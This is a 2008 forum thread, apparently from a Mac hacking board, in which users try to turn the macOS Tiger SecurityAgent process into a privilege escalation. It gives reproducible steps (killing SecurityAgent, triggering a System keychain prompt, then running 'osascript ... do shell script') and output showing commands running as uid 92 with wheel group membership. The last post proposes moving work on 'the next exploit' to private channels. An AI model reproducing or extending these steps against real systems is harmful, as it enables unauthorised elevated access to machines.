remote login Trojan, Trying to make a program that will select remote login. Options

[callmenames]

Still having trouble getting it pinned down but I am able to reproduce it sporadically.

CODE

$ ps -axww | grep Security
5981  ??  S      0:01.27 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent -psn_0_102236161
$ while :; do osascript -e 'tell app "SecurityAgent" to do shell script "id"'; done
uid=501(G4admin) gid=501(G4admin) groups=501(G4admin), 81(appserveradm), 79(appserverusr), 80(admin)
uid=501(G4admin) gid=501(G4admin) groups=501(G4admin), 81(appserveradm), 79(appserverusr), 80(admin)

Then some combination of killing it, running it etc. and....

CODE

ps -axww | grep Security
6198  ??  S      0:01.59 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent
$ while :; do osascript -e 'tell app "SecurityAgent" to do shell script "id"'; done
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)

Hmm.

CODE

$ ps -auxww | grep Security
security  6198   0.7  0.4   144740   5896  ??  S     1:53AM   0:01.78 /System/Library/CoreServices/SecurityAgent.app/Contents/MacOS/SecurityAgent

Ok, so at some point it's being launched / relaunched as itself, not as the user... and it appears to not be launched with an argument of a specific psn.

I killed it, after the next two lines...

CODE

uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=92(securityagent) gid=0(wheel) groups=0(wheel)
uid=501(G4admin) gid=501(G4admin) groups=501(angel), 81(appserveradm), 79(appserverusr), 80(admin)
uid=501(G4admin) gid=501(G4admin) groups=501(angel), 81(appserveradm), 79(appserverusr), 80(admin)

Well I can definitely get it to stop being uid=92 :) As for the getting it to be uid=92 that is proving somewhat more elusive.

This post has been edited by callmenames: Jun 21 2008, 04:09 AM

[callmenames]

Okey dokey, try this...

CODE

sudo killall SecurityAgent

The key here is to NOT get it relaunched as your user, so don't try any osascript yet.
Open Keychain Access (its in /Applications/Utilities)
Select the System keychain
Attempt to unlock it, or attempt to 'show password' for any item within it.
Now go try the osascript command.

CODE

osascript -e 'tell app "SecurityAgent" to do shell script "id"'
uid=92(securityagent) gid=0(wheel) groups=0(wheel)

This appears to be reproducible every time on my PPC/G4 Tiger/10.4.11 system.

Yep, I just restarted and reproduced it on the first try.


This post has been edited by callmenames: Jun 21 2008, 04:54 AM

[Siph0n]

SecurityAgent is responsible for the authentication prompt I believe, as well as many things accessed by the system from Security.framework. I wonder what its AppleScript dictionary is capable of...

This post has been edited by Siph0n: Jun 21 2008, 05:00 AM

[callmenames]

As far as I can tell, neither ARDAgent nor SecurityAgent have any AppleScript dictionary of their own. Either the apps are using a shared framework with AppleScript support or they are handing off the AppleScript commands elsewhere...

[Siph0n]

As far as I can tell, neither ARDAgent nor SecurityAgent have any AppleScript dictionary of their own. Either the apps are using a shared framework with AppleScript support or they are handing off the AppleScript commands elsewhere...

Perhaps some fooling with nm, class-dump and strings is warranted.

[callmenames]

Uh huh, I looked but nothing jumped out at me. All the output is here > http://rapidshare.de/files/39784043/Security.txt.zip.html




This post has been edited by callmenames: Jun 21 2008, 07:08 AM

[Siph0n]

Thanks. Unfortunately nothing jumped out at me either. I'm sure there's some fun tricks hiding in SecurityAgent though. It does more than I initially suspected.

[Oktane]

Yesterday I also noticed while testing all the apps on my computer (10.4.11) that SecurityAgent.app gave a unique output. However I tried using it to make a directory in root and/or the desktop and it always had permissions denied. I think that it carries special permissions set up by the programmers. I'm sure that whomever made that application would realize not to run "SecurityAgent" under anything devastingly powerful.

[Macpunk]

Okey dokey, try this...

CODE

sudo killall SecurityAgent

The key here is to NOT get it relaunched as your user, so don't try any osascript yet.
Open Keychain Access (its in /Applications/Utilities)
Select the System keychain
Attempt to unlock it, or attempt to 'show password' for any item within it.
Now go try the osascript command.

CODE

osascript -e 'tell app "SecurityAgent" to do shell script "id"'
uid=92(securityagent) gid=0(wheel) groups=0(wheel)

This appears to be reproducible every time on my PPC/G4 Tiger/10.4.11 system.

Yep, I just restarted and reproduced it on the first try.

Reproducible for me too. PPC/G4/10.4.111.

I was thinking about this last night and was gonna try this theory last night. xD

I'm thinking all you need is a prompt that asks for higher permissions. If that's true, then it ought to work with any application(as was demonstrated through Keychain Access).

--Macpunk

[Oktane]

As we draw closer to the next exploit how about we keep it on the down low, PM, IRC or a thread thats a little less HOT. just a suggestion